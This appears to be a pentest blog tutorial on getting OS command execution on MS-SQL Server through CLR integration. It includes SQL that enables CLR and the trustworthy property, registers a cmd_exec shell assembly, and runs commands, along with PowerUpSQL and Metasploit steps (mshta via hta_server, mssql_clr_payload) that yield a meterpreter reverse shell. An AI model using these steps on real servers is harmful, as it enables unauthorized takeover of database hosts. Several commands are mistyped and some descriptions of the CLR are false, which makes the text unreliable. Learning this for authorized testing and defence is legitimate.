In this article, we will learn all about CLR assembly functionality provided by Microsoft and how we can exploit it to our potential.
Table of Content:
is Common Language Runtime Integration?
Database Property
CLRIntegration with GUI
Trustworthy with GUI
Trustworthy with CLI
CLR Assembly
o Creating a
DLL File
o Assemble
DLL file with GUI
CLRItegration with CLI
DLL file with CLI
and PowerUpSQL
What is Common Language Runtime Integration?
Common Language Runtime is a feature provided
by Microsoft as part of their Windows operating systems that allows for executing
.NET Framework-compatible software. This runtime environment is responsible for
implementing .NET programs, including compiled ASP.NET pages and Mono
applications. It is used by .NET Framework and the Windows kernel and has been
adopted by other operating systems such as Java ME, Apache Harmony, and
Android. It is generally considered a more stable and fully-featured
alternative to the Java Virtual Machine (JVM). It also manages the code execution
environment for Microsoft operating systems.
These managed codes are compiled and are
further used by units. These units are called assembly. These assemblies
contain a load full of DLL or EXE files. EXE files can execute on their own,
whereas DLL files need to be hosted in an application. If managed correctly,
these DLL files can be enforced by the MS-SQL server as well.
The CLR receives compiled applications or
assemblies from different processes via assembly loading, then executes them in
an isolated execution environment to ensure their security and integrity. With
the help of CLR, you can write stored procedures, user-defined functions,
user-defined types, etc.
Trustworthy Database Property
Trustworthy database property helps to determine
that whether the SQL server relies on a database or not. When working with CRL,
there will be many instances where special commands or procedures deem it vital
to have particular privileges. It requires such a license so that it can
protect the database from malicious scenarios. Many properties can be used in
windows servers and SQL servers to determine if the database is trusted. The
properties must be set accordingly to allow the SQL server to function. One
method for doing this is by adding the trust command on both servers.
A drawback of a Trustworthy Property would be
that it might take up resources like memory, which could cause performance
issues in specific scenarios. For this reason, it’s best not to rely on these
types of properties too heavily when developing applications or data models.
However, they are helpful when used with other techniques like event
subscriptions or agent-based systems under a testing environment where resource
consumption doesn’t matter much and performance isn't essential either.
Enabling CLRIntegration with GUI
To enable the trustworthy feature manually,
right-click on the server’s name. A drop-down menu will appear. From the said
menu, click on the Facets option as shown in the image below:
Once you click on the Facets option, a
Facets dialogue box will open. From this dialogue box, open the Facet drop-down
menu and select the Surface Area Configuration option from this
drop-down menu as shown in the image below:
After choosing the Surface Area configuration,
turn the value of ClrIntegrationEnabled true from false. This value can
be changed under Facet properties, as you can see in the image below:
Enable Trustworthy
with GUI
After enabling CLR, go to the server>Databases>System
Databases>msdb. Right-click on msdb. A drop menu will appear. From this
menu, choose the Properties option as shown in the image below:
Once you have clicked on the Properties option,
a dialogue box will open. From the left tab, choose options. In the right
panel, you can see the trustworthy property. Here, you can change its
value from false to true to enable it. The similar is shown in the image below:
Enable Trustworthy with CLI
To enable trustworthy from CLI, open the query
window of msdb and type the following query:
Executing the above query will enable the
trustworthy property.
Exploiting CLR Assembly
Creating a DLL File
Now that we have understood the use of CLR
assembly and trustworthy, along with their relationship with each other. And
so, we will now exploit it to our potential. We know that CLR executes DLL
files; therefore, we will create a DLL file using visual studio.
To create a DLL using visual studio; open
visual studio and select Create a new project option, as shown in the
image below:
A new panel will open, and here, select Class
Library (.NET framework) and then click on the Next button as shown
in the image below:
A new window will open. In that window, give
your project a name, location and then click on Create button as shown
in the image below:
Following the above steps will create your new
project and add the code that will be necessary. The code that we have used can
be found
here. Now, in the menu bar,
click on the Build menu as shown in the image below:
From the Build’s drop-down menu, select the Build
Solution option as shown in the image below:
As you can see in the image below, now your DLL
file is created as desired. Now that we have our DLL file, we can exploit CLR
with the help of this DLL file.
Assemble DLL file with GUI
Let’s put that DLL file to good use. Go to server>Databases>System
Databases>msdb>Programmability, and under Programmability, there will
be an Assemblies option. Right-click on the said option and select New
Assembly from the drop-down menu as shown in the image below:
A dialogue box will open after following the
above steps. In the dialogue box, set the Permission set to Unrestricted
and give the path of your DLL file and then finally click on the OK button
as shown in the image below:
The above steps have created an assembly with
your DLL file. You can see it by going to server>Databases>system
Databses>msdb>Progammibility>Assemblies>*DLL File*. The same is
shown in the image below:
To execute that DLL file, run the following
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand
NVARCHAR (4000) AS EXTERNAL NAME [shell].[StoredProcedures].[cmd_exec];
With the query above, the DLL file is executed.
And now you can run any command as a query:
cmd_exec ‘whoami’
As you can see in the image above, the command
is executed, and you can see the result of the command in the output panel.
The method we just learned was manual. Let us
now learn how we can do the same thing using the command line. But first, we
should delete the assembly and procedure to start afresh, and to do so, type:
Enabling CLRIntegration with CLI
We can also exploit CLR using various queries
through the command line. Firstly, let access the database by using the
following query:
use msdb
Once we have accessed the database, we now need
to enable CLR integration and for that type:
EXEC sp_configure ‘clr enabled’, 1;
Now to confirm whether CLR integration was
enabled with the above command or not, use the following query:
SELECT * FROM sys.configuration WHERE name =
‘clr enabled’
And in the image above, you can see that the
value of configuration is 1, which means our CLR integration is enabled.
Moving on, we have to enable trustworthy
property next. So, for that type:
To check whether our above command was
successfully executed or not, use the following query:
select name, is_trustworthy_on from
In the above image, you can see that value for
trustworthy is 1 of the msdb database. That means the said property is
successfully enabled.
Assembling DLL Flie
via Command Line
We already have a DLL file called shell that we
created with the help of visual studio earlier. You can find that file in the
temp folder.
Now let’s use this DLL file and create an
assembly with the help of the following commands:
FROM ‘c:\temp\shell.dll’
Our next step is to create the procedure and we
will do so with the help of the following command:
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand
NVARCHAR (4000) AS EXTERNAL NAME [shell].[StoredProcedures].[cmd_exec];
Once the above commands are executed
successfully, you can then execute any command such as;
cmd_exec ‘whoami’
And as you can see in the above image, we have
the result of our command.
PowerUpSQL (Manual)
When it comes to exploiting SQL servers,
PowerUpSQL is the best third-party tool. This tool will also allow us to
exploit CLR through DLL files to our potential. And to do so, use the following
set of commands:
powershell -ep bypass
cd .\PowerUpSQL-master\
Import-Moduolle .\PowerUpSQL.ps1
Create-SQLFileCLRDll -ProcedureName
"runcmd" -OutFile runcmd -OutDir c:\temp -Verbose
The command will create three files for you,
i.e., .csc, .dll, and .txt as shown
in the image above. Now go to the temp directory and open the txt file with the
following command:
type runcmd.txt
Now take the entire content of the said txt
file, copy it, and paste it in the SQL query panel as shown in the image below:
After running the code, you will have your
result in the output section, as shown in the image above.
PowerUpSQL (Remotely)
Another PowerUpSQL method to retrieve the same
result is a remote method. This method is useful as even if the CLRIntegration
is disable, it will go ahead and enable it for you. The command for this is as
Invoke-SQLOSCmdCLR -Username sa -Password
Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS –Command "whoami"
Note: this command is useful if you have the
username and password of the database.
You can also see in the result in a grid view
by using the following command:
Get-SQLStoredProcedureCLR -Verbose -Instance
WIN-P83OS778EQK\SQLEXPRESS -Username sa -Password 'Password@1' | Out-GridView
Metasploit and PowerUpSQL
In this method, we will combine Metasploit and
PowerUpSQL tools to put both of them to good use to achieve the desired result.
For this open Metasploit and type the following set of commands:
use exploit/windows/misc/hta_server
set srvhost *localhost*
The above exploit will generate a URL as shown
in the image aove. Copy the said URL and paste it in the following command of
Invoke-SQLOSCmdCLR -Username sa -Password
Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS –Command "mshta.exe" -Verbose
Once the above command is executed, you will
have your meterpreter session to the server as shown in the image below:
Metasploit being the excellent framework that
it is, makes all our work simple and easy. If we review, to exploit CLR, we
have first to enable CLR integration and then enable trustworthy database
property. After that, we create an assembly that executes our DLL file. All
these multiple steps are taken care of with a single Metasploit exploit. To use
the said exploit, type the following set of commands:
use exploit/windows/mssql/mssql_clr_payload
set rhosts n*locahost*
set username sa
set password Password@1
set payload mwindows/x64/meterpreter/rever_tcp
And as you can see, this payload follows all
out multiple steps for us and even gets us the meterpreter session. The only
condition for this exploit to work is to know the username and password.
CLR Integration is prone to vulnerability. And
most cases, you will find that trustworthy property is enabled, but if it isn’t,
we have learned many methods to allow it to activate in the article. These were
all the methods through which one can exploit CLR integration using DLL files
as it enables the execution of the DLL files. Such techniques also help to
pentest an MS-SQL server.
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